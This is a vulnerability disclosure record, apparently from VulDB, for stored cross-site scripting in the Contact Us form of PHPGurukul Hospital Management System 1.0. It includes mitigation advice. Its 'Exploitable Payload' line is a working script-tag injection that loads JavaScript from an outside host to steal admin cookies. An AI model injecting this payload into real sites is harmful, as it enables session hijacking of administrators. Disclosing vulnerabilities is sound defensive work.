| Title | PHPGurukul Hospital Management System 1.0 Cross site scripting |
|---|
| Description | Details:
- **Affected Component:** Contact Us Form
- **Endpoint:** `https://192.168.1.12/Hospital-Management-System-PHP/hospital/index.php#contact_us`
- **Vulnerable Input Fields:** Name, Email Address, Message
- **Exploitable Payload:** `"><script src="https://js.rip/9jgolnku9i"></script>`
- **Impact:** Admin's cookies compromised upon reviewing Contact Us queries.
Recommendations:
1. Validate and sanitize user inputs.
2. Implement Content Security Policy (CSP) for XSS mitigation.
3. Promptly investigate and address this vulnerability. |
|---|
| Source | ⚠️ https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing |
|---|
| User | mallutrojan (UID 60819) |
|---|
| Submission | 03.01.2024 17:20 (2 years ago) |
|---|
| Moderation | 06.01.2024 16:43 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 249843 [PHPGurukul Hospital Management System 1.0 Contact Form index.php#contact_us Name/Email/Message Cross Site Scripting] |
|---|
| Points | 20 |
|---|